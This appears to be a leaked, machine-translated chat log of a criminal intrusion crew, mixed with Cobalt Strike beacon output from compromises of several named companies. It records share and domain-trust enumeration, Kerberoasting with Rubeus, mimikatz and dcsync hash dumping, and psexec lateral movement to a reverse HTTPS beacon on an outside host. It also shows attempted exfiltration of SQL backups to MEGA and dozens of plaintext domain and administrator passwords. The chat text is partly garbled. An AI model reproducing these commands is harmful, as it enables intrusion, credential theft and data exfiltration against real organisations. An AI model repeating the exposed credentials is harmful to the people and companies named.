``that's what kind of silent excitermelanu and all and alive so I keeled it a long time ago better spawn it? why should it die in the first place it won't die do a better spawn first do a spawn kill the session will die
psinject 4728 x86 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt
````CheckShareAccess` ?
ERROR: Invoke-ShareFinder : A parameter cannot be found that matches parameter name 'checkaccess'.
``where is the -checkaccess flag wev beacon> psinject 4540 x64 Invoke-ShareFinder I also wondered if it shows access balls, not just enum balls? ah, it's for that message) yeah, I don't know)) I thought roll call is to whom and where?sccy.com it turns out...no big deal, it turns out? not a wrong password? it says access denied it if you're talking about the sharfinder output there above look it up, access denied
they have a lockout after 5 failed, i think how not to break it with the admin-not yet out of the point?
beacon> shell MEGAclient.exe put -q --ignore-quota-warn F:\SQLBackup\*.bak
[*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn F:\SQLBackup\*.bak
[+] host called home, sent: 91 bytes
[+] received output:
[API:err: 23:56:12] Unable to open local path: \\?\F:\SQLBackup\*.bak
beacon> shell MEGAclient.exe put -q --ignore-quota-warn \\\wwsql2\F$\SQLBackup\*.bak
[*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn \\\wwsql2\\F$\SQLBackup\*.bak
[+] host called home, sent: 100 bytes
[+] received output:
[API:err: 23:56:38] Unable to open local path: \\?\\\wwsql2\F$\SQLBackup\*.bak
``Will it work?`` That's what I mean.
MEGAclient.exe put -q --ignore-quota-warn *.bak
No, it's not like all the backups will fit in there without archiving, but in MEGA you can put *hm in the filename
ztclmgplmwfqmcjqfn@wqcefp.com
745jkiJIGSFjer67
```
I'll upload it here.
`QfvqBgx767v14bn6c0JlKw` but you noticed it in general in the intranet they often work by looking at the keywordPDI_backup_2021_01_10_053001_4017258.bak
Intranet_backup_2021_01_10_053001_3704801.bak
ManagementInfo_backup_2021_01_10_053001_3861023.bak
Development_backup_2021_01_10_053001_3392249.bak
Financial_backup_2021_01_10_053001_3548530.bak
2гб28,398,080 CCC_backup_2021_01_10_053001_3079732.bak
28 meters``.
beacon> shell dir F:\SQLBackup
[*] Tasked beacon to run: dir F:\SQLBackup
[+] host called home, sent: 47 bytes
[+] received output:
Volume in drive F is Data
Volume Serial Number is 0E12-2B9D
Directory of F:\SQLBackup
01/10/2021 10:00 PM .
01/10/2021 10:00 PM .
01/10/2021 05:30 AM 778,129,920 Analysis_backup_2021_01_10_053001_2923480.bak
01/10/2021 05:30 AM 8,176,882,176 Audit_backup_2021_01_10_053001_3079732.bak
01/10/2021 05:30 AM 28,398,080 CCC_backup_2021_01_10_053001_3079732.bak
01/10/2021 05:30 AM 398,543,360 Chemical_backup_2021_01_10_053001_3079732.bak
01/10/2021 05:30 AM 8,999,424 coupons_backup_2021_01_10_053001_3236000.bak
01/10/2021 05:31 AM 81,874,432 damage_backup_2021_01_10_053001_3236000.bak
01/10/2021 05:32 AM 9,034,617,344 datawarehouse_backup_2021_01_10_053001_3392249.bak
01/10/2021 05:31 AM 492,955,136 development_backup_2021_01_10_053001_3392249.bak
01/10/2021 05:34 AM 13,386,831,360 DRB_backup_2021_01_10_053001_3392249.bak
01/10/2021 05:47 AM 125,342,217,728 ElectronicJournals_backup_2021_01_10_053001_3548530.bak
01/10/2021 05:47 AM 1,747,013,120 Financial_backup_2021_01_10_053001_3548530.bak
01/10/2021 05:47 AM 485,575,168 Intranet_backup_2021_01_10_053001_3704801.bak
01/10/2021 05:47 AM 1,256,280,576 Inventory_backup_2021_01_10_053001_3704801.bak
01/10/2021 05:49 AM 12,605,082,112 Labor_backup_2021_01_10_053001_3704801.bak
01/10/2021 05:49 AM 28,398,080 ManagementInfo_backup_2021_01_10_053001_3861023.bak
01/10/2021 05:30 AM 4,024,832 master_backup_2021_01_10_053001_2142238.bak
01/10/2021 05:54 AM 2,821,808,640 Metabase_backup_2021_01_10_053001_4642233.bak
01/10/2021 05:30 AM 2,729,472 model_backup_2021_01_10_053001_2767253.bak
01/10/2021 05:50 AM 3,761,328,640 Morning_backup_2021_01_10_053001_3861023.bak
01/10/2021 05:30 AM 66,149,888 msdb_backup_2021_01_10_053001_2767253.bak
01/10/2021 05:50 AM 2,615,249,408 Payrolll_backup_2021_01_10_053001_3861023.bak
01/10/2021 05:50 AM 3,232,256 PDIPriceBook_backup_2021_01_10_053001_4017258.bak
01/10/2021 05:50 AM 1,482,774,016 PDI_backup_2021_01_10_053001_4017258.bak
01/10/2021 05/2021 05:52 AM 15,148,882,432 PLUHistory_backup_2021_01_10_053001_4173454.bak
01/10/2021 05:52 AM 1,110,528,512 POSInfo_backup_2021_01_10_053001_4173454.bak
01/10/2021 05:30 AM 8,479,232 ReportServerTempDB_backup_2021_01_10_053001_2923480.bak
01/10/2021 05:30 AM 118,684,160 ReportServer_backup_2021_01_10_053001_2767253.bak
01/10/2021 05:52 AM 3,430,912 Scorecard_Settings_backup_2021_01_10_053001_4173454.bak
01/10/2021 05:53 AM 1,074,877,952 Shared_backup_2021_01_10_053001_4329699.bak
01/10/2021 05:53 AM 11,357,211,136 specialty_backup_2021_01_10_053001_4329699.bak
01/10/2021 05:53 AM 705,843,712 SQI_backup_2021_01_10_053001_4329699.bak
01/10/2021 05:53 AM 2,021,739,008 Swipe_backup_2021_01_10_053001_4485967.bak
01/10/2021 05:54 AM 24,244,736 Test_backup_2021_01_10_053001_4642233.bak
01/10/2021 05:53 AM 242,305,536 Tips_backup_2021_01_10_053001_4485967.bak
01/10/2021 05:53 AM 4,738,560 WWBackOffice_backup_2021_01_10_053001_4642233.bak
35 File(s) 216,430,061,056 bytes
2 Dir(s) 787,610,132,480 bytes free
``Then pick one of your choice from the list above. Won`t you get burnt again? I`d take them.
WWSQL.waterway.com
CCC 15549
CCCDenver 10
WWSQL2.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
Analysis 824
datawarehouse 12105
development 620
DRB 24028
Financial 1676
Payroll 2633
POSInfo 1272
PDIPRODSQL.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
PDICompany_1137_01 43320
``[ ](https://mediaeveryone.com/group/waterway-com?msg=h52pqMWzd3NZ66geo) these backups, what databases to unload? ladies, what are we talking about? with databases@tl1 and what is the resultFinancial
Development[ ](https://mediaeveryone.com/group/waterway-com?msg=JGmFk2598zma3v55v) these are interesting. Which ones to export and upload?
there are no listings backupagatak there's even a prefix old, they were rubbed and that's it, why are we stopping at it as much as I have encountered, there's an anchorable until you find a subnet in which the loss > 0% there also an anchorable from other subnets pinged not, it means not pinged it rather 100% loss than anchorahahaha it's like @user7 had 40 servers on hell, but alive 70[ ](https://mediaeveryonecom/group/waterway-com?msg=9euTBxfTrFDYCn8s4) is like 15 out of 10[ ](http://mediaeveryone.com:3000/group/waterway-com?msg=favdnjaS7YHBZPuvT) I did
shell netstat -abn and look on what port processes sqlservr, sqlwriter are running on and there's just no pings for me over 100% lossd well here are two that aren't pinged just with the prefix old
and the other two with closed ports `Destination host unreachable.
Teemo[WWDC2]SYSTEM */628|2021Jan15 02:00:34> shell ping WWSQLOLD -n 1
[*] Tasked beacon to run: ping WWSQLOLD -n 1
[+] host called home, sent: 49 bytes
[+] received output:
Pinging WWSQLOLD.waterway.com [192.168.0.37] with 32 bytes of data:
Reply from 192.168.0.222: Destination host unreachable.
Ping statistics for 192.168.0.37:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Teemo[WWDC2]SYSTEM */628|2021Jan15 02:01:03> shell ping WWSQL2Old -n 1
[*] Tasked beacon to run: ping WWSQL2Old -n 1
[+] host called home, sent: 50 bytes
[+] received output:
Pinging WWSQL2Old.waterway.com [192.168.0.83] with 32 bytes of data:
Reply from 192.168.0.222: Destination host unreachable.
Ping statistics for 192.168.0.83:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
``````
Teemo[WWDC2]SYSTEM */628|2021Jan15 01:59:00> shell ping PDITESTSQL -n 1
[*] Tasked beacon to run: ping PDITESTSQL -n 1
[+] host called home, sent: 51 bytes
[+] received output:
Pinging PDITESTSQL.waterway.com [192.168.0.127] with 32 bytes of data:
Reply from 192.168.0.127: bytes=32 time=1ms TTL=128
Ping statistics for 192.168.0.127:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1ms, Maximum = 1ms, Average = 1ms
Teemo[WWDC2]SYSTEM */628|2021Jan15 01:59:21> shell ping wwsql02 -n 1
[*] Tasked beacon to run: ping wwsql02 -n 1
[+] host called home, sent: 48 bytes
[+] received output:
Pinging wwsql02.waterway.com [192.168.0.59] with 32 bytes of data:
Reply from 192.168.0.59: bytes=32 time<1ms TTL=64
Ping statistics for 192.168.0.59:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
are they not pinging? haven't you tried those from other segments?
or those ports are closed?) and on these and do not get in without smb and rdps other network segments? yes, i.e. the servers can not go to? @user8 how to find a skull server two off
and two (PDITESTSQL,wwsql02) do not see anything, no ports 1433,445,3389,139
WWSQL.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
AppSettings 14
AuthorizeNet 3736
CCC 15549
CCCDenver 10
Donations 30
Fundraising 14
GravityForms 903
HotSchedules 39
LocalMarketing 12
Loyalty 201
Silverpop 2993
Timeclock 9298
WooCommerce 104
(13 rows affected)
WWSQL2.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
Analysis 824
Audit 10825
CCC 29
Chemical 444
coupons 10
damage 87
datawarehouse 12105
Development 620
DRB 24028
ElectronicJournals 150418
Financial 1676
Intranet 3627
Inventory 1331
Labor 13508
ManagementInfo 30
Metabase 2708
Morning 4934
Payroll 2633
PDI 1522
PDIPriceBook 4
PLUHistory 15546
POSInfo 1272
ReportServer 31096
ReportServerTempDB 992
Scorecard_Settings 4
Shared 1084
Specialty 14329
SQI 1554
Swipe 5506
Test 453
Tips 263
WWBackOffice 6
(32 rows affected)
PDIPRODSQL.waterway.com
name
-------------------------------------------------------------------------------------------------------------------------------- -----------
PDI_Stage_1137_01 3130
PDI_Warehouse_1137_01 6829
PDICompany_1137_01 43320
PDICompany_1137_01_FRx 5
PDICompany_1137_91 34633
PDICompany_1137_91_FRx 4
PDICompany_1137_92 42048
PDICompany_1137_92_FRx 4
PDICompany_1137_93 35983
PDICompany_1137_93_FRx 4
PDICompany_1137_94 37376
PDICompany_1137_94_FRx 4
PDIFoundation_1137 82096
PDIMaster 238
ReportServer 37613
ReportServerTempDB 174
(16 rows affected)
``````
WATERWAY\djarden MyNewPassword6
WATERWAY\Quser pdiC1137qu!
WATERWAY\Administrator 1853Gators
WATERWAY\datavault Waterway727
WATERWAY\domainrestore Waterway727
WATERWAY\mapusatera Gators1853
WATERWAY\veeam_admin 99Waterway
WATERWAY\Applied Waterway99
WATERWAY\DBunte Waterway99
WATERWAY\gkeller Waterway76
WATERWAY\SEnglert Waterway99!
WATERWAY\blauer 11915Admin2179!
WATERWAY\mharper LoveUnit14
``@user3@user9
```
WWSQL.waterway.com
WWSQL2.waterway.com
WWSQLOLD.waterway.com
WWSQL2Old.waterway.com
WWsql02.waterway.com
PDIPRODSQL.waterway.com
PDITESTSQL.waterway.com
``would like + listings where? take away there is a pst that is 1.png and a 6 gig pst of some itishpost still
a couple of pumped out all you got ready? ok, i'll yank the cc_data.mdf it would be nice to pick up their backups? what's not ready? hello):space_invader:dayyou're all set for tomorrow's slip and everything as usual by 11pm see everything else, mine is no longer fit for me? hello, everyone, hello
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated:2005/09/14-17:51:44 Mountain Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)
>trustAttributes: 4 [Quarantined-Domain(4)]
``a bh withdrew.``
fuck
i don't know...suddenly my lock aca was heard imperesnimu traststranimu how i then removed bhvisibly ldap queries are forbidden...weird
it should work
Using server: AUS-DCON-01.ap.panavision.com:3268
Directory: Windows Server 2012 R2
dn:CN=panavision.com,CN=System,DC=ap,DC=panavision,DC=com
>whenCreated: 2006/01/16-15:54:35 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]
dn:CN=panavision.com,CN=System,DC=eu,DC=panavision,DC=com
>whenCreated: 2006/03/02-04:37:35 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]
dn:CN=panavision.com,CN=System,DC=na,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:50:01 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:51:44 Pacific Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)
>trustAttributes: 4 [Quarantined-Domain(4)]
dn:CN=eu.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2006/03/02-04:33:06 Pacific Daylight Time
>name: eu.panavision.com
>securityIdentifier: S-1-5-21-2619205848-3123681340-272399168
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: eu.panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]
dn:CN=sa.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2007/10/25-01:46:47 Pacific Daylight Time
>name: sa.panavision.com
>securityIdentifier: S-1-5-21-486547592-1649593982-2333919999
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: sa.panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]
dn:CN=na.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:49:49 Pacific Daylight Time
>name: na.panavision.com
>securityIdentifier: S-1-5-21-4080305880-3103530751-2544733278
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: na.panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]
dn:CN=ap.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2006/01/16-15:54:34 Pacific Daylight Time
>name: ap.panavision.com
>securityIdentifier: S-1-5-21-396909831-1571174283-2495636022
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ap.panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]
dn:CN=panavision.com,CN=System,DC=sa,DC=panavision,DC=com
>whenCreated: 2007/10/25-01:47:46 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]
dn:CN=LEEFILTERS.UK,CN=System,DC=panavision,DC=com
>whenCreated: 2018/09/25-16:33:19 Pacific Daylight Time
>name: LEEFILTERS.UK
>securityIdentifier: S-1-5-21-2580217452-235510033-4179086628
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: LEEFILTERS.UK
>trustType: 2 [UpLevel(2)
>trustAttributes: 24 [Transitive(8);Cross-Organization(16)]
10 Objects returned
``Well, I mean not in quarantine?
beacon> shell adfind.exe -b DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 109 bytes
[+] received output:
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral
beacon> shell adfind.exe -b DC=PANAVISION -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=PANAVISION -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 102 bytes
[+] received output:
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral
beacon> shell adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 115 bytes
[+] received output:
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral
``````
>name: panavision.com
>name: PANAVISION
>name: eu.panavision.com
>name: sa.panavision.com
>name: na.panavision.com
>name: ap.panavision.com
>name: LEEFILTERS.UK
``Certain domain is in the trust? I think I got it right...I'm writing the parameter wrong?
beacon> shell adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 115 bytes
[+] received output:
AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral
``I don't understand what bhs has to do with the trusts? did you rubeustus put on the trusts? i mean this[ ](https://mediaeveryone.com/group/panavision-com?msg=F5ysCxAFokCmqCfmF) )and what does this have to do with bhs? i mean kerberostsnaught bhs all the trusts surveyed the domain composition? and you kerberosts trusts? khmg[vloli already acq YES locked))))0created also threwdanu in the first you went up yes? the problem with going to the truststhose things are
DEN-DCON-02.na.panavision.com [DS] Site: Denver
DEN-DCON-01.na.panavision.com [PDC] [DS] Site: Denver
WDH-DCON-02.na.panavision.com [DS] Site: Woodland-Hills
The command completed successfully
=============================================
PDC
Alias name administrators
Comment Members can fully administer the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
DEN-DCON-01$
Domain Admins
PVRT\Enterprise Admins
PVRT\wmi.service
=============================================
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
#yromero adfs.admin Administrator
BackupMgr CZambrana_da exponential
it.deploy it.inventory jharris_da
mpatterson_ea orivera_da PKooiman_da
sanadmin SP_Admin SQLAgent
windchilladmin yromero_ea
pvna\#yromero V@ndals1974
=============================================
``There's an ahaYou here?`` I'll fucking explain if I start, it's more confusing, it's easier to actually read it.`` TrustDirection is not a power of attorney, read what I threw outhttp://www.harmj0y.net/blog/redteaming/the-trustpocalypse/так is essentially a two-way power of attorney?`http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/почему should that affect the trustAttributes?`>trustDirection: 3 [Inbound(1);Outbound(2)]````
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated:2005/09/14-16:51:44 Pacific Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)
>trustAttributes: 4 [Quarantined-Domain(4)]
``Can you explain this point?
beacon> shell ping -n 1 sa.panavision.com
[*] Tasked beacon to run: ping -n 1 sa.panavision.com
[+] host called home, sent: 58 bytes
[+] received output:
Pinging sa.panavision.com [192.168.64.50] with 32 bytes of data:
Request timed out.
Ping statistics for 192.168.64.50:
Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
``And I realized that we have no sa domain migrate to quarantine domain? how to google such questions? in 2 streamsada what did you scan? just range /24 ?too want to work) to the heart ... work, but I do not get up with the office tomorrow))) and you?) yes I am usually here until morninga what do you do not sleep? not thick, 2 pcs ?
[*] 10.100.7.15:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3w 0d 14h 29m 10s) (guid:{ce3aadf5-49db-4506-983e-b24acd38dfd6}) (authentication domain:PVRT)
[+] 10.100.7.15:445 - Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-01) (authentication domain:PVRT)
[*] 10.100.7.16:445 - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] 10.100.7.14:139 - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] 10.100.7.16:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3d 12h 33m 11s) (guid:{1466eec3-53c0-4eb4-af7e-1dabe2584051} (authentication domain:PVRT)
[+] 10.100.7.16:445 - Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-02) (authentication domain:PVRT)
``OK, the main thing is to check that all YES in hashdump 3941 in ad_user 3954ad users long opens now count the number of users in the domain? the client itself has hung? or session? after hashdump see if the coballstrike hung)
dcsync does not fit into the file ?
```
you could just do the hashdump on the idea, right? ``
C:{\WINDOWS\Temp> del eula.dll
C:WINDOWS/Temp\eula.dll
Access is denied.
C:\WINDOWS\Temp> whoami
friver\i3bdr
I don't think the skis are going wrong then use ntds utill should be here or not here ?from creds export@tl1 what is the syntax ? dcsync can't get into the file ?it's holding the process can't delete the fucking files
100666/rw-rw-rw- 139680 fil 2020-10-06 23:01:55 +0200 eula.dll
40777/rwxrwxrwx 0 dir 2012-06-25 19:57:03 +0200 hsperfdata_SYSTEM
100666/rw-rw-rw- 22101 fil 2020-10-06 23:37:06 +0200 mimikatz.log
``DK in the cob what? Have you got it up? Have you got it up on the grid on your compaNot understood the questionDo you need to get the system up there? OK, that was the original taskDa@tl1 let me first jump (run dll) on the DK, take the dsink, then look for a server, there are lots of options now?
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 01:02:30> shell dir \\SOLARWINDS\C$\Users
[*] Tasked beacon to run: dir \\SOLARWINDS\C$\Users
[+] host called home, sent: 254 bytes
[+] received output:
Volume in drive \SOLARWINDS\C$ has no label.
Volume Serial Number is B6E7-695C
Directory of \SOLARWINDS\C$\Users
09/02/2020 02:07 PM .
09/02/2020 02:07 PM .
03/07/2016 10:54 AM .NET v2.0
03/07/2016 10:54 AM .NET v2.0 Classic
03/07/2016 10:54 AM .NET v4.5
03/07/2016 10:54 AM .NET v4.5 Classic
09/28/2015 10:52 AM Administrator
04/29/2020 12:07 AM azure_join@friver.local
03/07/2016 10:54 AM Classic .NET AppPool
09/10/2018 09:26 AM frtech
08/07/2020 11:23 AM KGillisAdmin
06/25/2020 11:14 AM mfinniganadmin
10/30/2018 02:20 PM MsDtsServer120
10/30/2018 05:06 PM MsDtsServer130
07/17/2018 09:52 AM MSSQLFDLauncher
10/30/2018 02:20 PM MSSQLSERVER
10/30/2018 02:20 PM MSSQLServerOLAPService
02/18/2020 10:53 AM pcrusieadmin
06/22/2015 03:10 PM Public
10/30/2018 02:20 PM ReportServer
06/15/2020 10:24 AM rgoinsadmin
10/30/2018 02:21 PM SQLSERVERAGENT
10/30/2018 05:22 PM SQLTELEMETRY
10/30/2018 05:20 PM SSASTELEMETRY
10/30/2018 05:06 PM SSISTELEMETRY130
0 File(s) 0 bytes
25 Dir(s) 43,644,530,688 bytes free
``and the tolist show me C:\users of this serveraha ok + what's the dll? coba? ``dn:CN=SOLARWINDS,OU=Servers,OU=Corporate,DC=FRIVER,DC=LOCAL``
this is the serveri look for the serverdump the hashes))))) finally the toura` ``
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:54:55> shell net use X: \SOLARWINDS\C$ /user:FRIVER\i3bdr 7Fv(l7c5h)Pq
[*] Tasked beacon to run: net use X: \SOLARWINDS\C$ /user:FRIVER\i3bdr 7Fv(l7c5h)Pq
[+] host called home, sent: 280 bytes
[+] received output:
The command completed successfully.
``````
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:51:25> shell net user i3bdr /dom
[*] Tasked beacon to run: net user i3bdr /dom
[+] host called home, sent: 50 bytes
[+] received output:
The request will be processed at a domain controller for domain FRIVER.LOCAL.
User name i3bdr
Full Name i3brd Backup
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set ?10/?21/?2016 2:34:30 PM
Password expires Never
Password changeable ?10/??24/?2016 2:34:30 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon ??10/?6/?2020 5:51:26 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Deny_Share_access *CitrixVPNAccess
*Domain Users *SQL Administrators
*Domain Admins *Payroll-SQLAdmins
The command completed successfully.
``I'm so fucked up, I won't say it again.
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct07 00:48:15> jump psexec_psh DIV79-FS-01 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (regbest.com:443) on DIV79-FS-01 via Service Control Manager (PSH)
[+] host called home, sent: 214277 bytes
[-] Could not open service control manager on DIV79-FS-01: 1722
[-] Could not connect to pipe (\DIV79-FS-01\pipe\status_4d6): 53
[+] host called home, sent: 152 bytes
\DIV79-FS-01 \pipe_host sent 152 bytes) \Why are we here just for fun)\and check more YES after you take the hashes off the server as far as possible is not critical no processes YES no one has been here for a long time and the server is not a serverKhat?
* Username : i3bdr
* Domain : FRIVER
* Password : 7Fv(l7c5h)Pq
?`opaaa``
Members
-------------------------------------------------------------------------------
ADFS adminsolar ayoderadmin
azureadmin bhilladmin BlackStratus$
BNelsonAdmin chailadmin CRMadmin
cwilsonadmin datacubepro dpawlakadmin
FaxAdmin gkoontzadmin gzapataadmin
i3bdr jsteffenadmin KGillisAdmin
mfinniganadmin MSOL_43139b2cee97 pcrusieadmin
rgoinsadmin ScaleService
SCCM-01$ sccmadmin sonicwalladmin
veeambr vmadmin
``user3 mimic if only that was taken off what else? said that now will take off more only that was taken off or only that was taken off? this is not an answer) took off lehabyl or took off? only hashdump the rest was taken off? the car is old, do not check the creed` ``
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:30:06> shell net use X: \cor-crm-02.friver.local\C$ /user:cor-crm-02\Administrator Shotgun913
[*] Tasked beacon to run: net use X: \cor-crm-02.friver.local\C$ /user:cor-crm-02\Administrator Shotgun913
[+] host called home, sent: 112 bytes
[+] received output:
System error 384 has occurred.
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
``Now alexei will run the dll and continue the work if it works - I'll send it right away nea (managed to determine the pass from FaxAdmin ?Ok, now I will throw the ad infona citrix under sox - from there we call kmd and attract citra, I wonder where it will lead evenachivmentvector open `` ``
URL : http://citrixweb-01/Citrix/XenApp/auth/login.aspx
Username : tkennedy
Password : Forest5454#
``+`psinject 7288 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\hashes.txt -append -force -encoding UTF8 ``Why not, let it lie there the point of Invoke-Kerberos ?took+without admincount`execute-assembly Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes.txt````
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct06 18:52:54> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain FRIVER.LOCAL.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
ADFS adminsolar ayoderadmin
azureadmin bhilladmin BlackStratus$
BNelsonAdmin chailadmin CRMadmin
cwilsonadmin datacubepro dpawlakadmin
FaxAdmin gkoontzadmin gzapataadmin
i3bdr jsteffenadmin KGillisAdmin
mfinniganadmin MSOL_43139b2cee97 pcrusieadmin
rgoinsadmin ScaleService
SCCM-01$ sccmadmin sonicwalladmin
veeambr vmadmin
The command completed successfully.
``````
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct06 18:57:21> shell net group "Enterprise Admins" /dom
[*] Tasked beacon to run: net group "Enterprise Admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain FRIVER.LOCAL.
Group name Enterprise Admins
Comment Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
pcrusieadmin rgoinsadmin
The command completed successfully.
``````
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct06 18:58:27> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name Administrators
Comment
Members
-------------------------------------------------------------------------------
Administrator
FRIVER\Domain Admins
FRIVER/Local Desktop Administrators
FRIVER\teledata
FRTech
The command completed successfully.
``Everything, leave it as it is and just go to lpe and so ona dll delete or leave it ?keep working + not deleted+`C:\Users\tkennedy\AppData\Local\Microsoft\Office` - here the dll
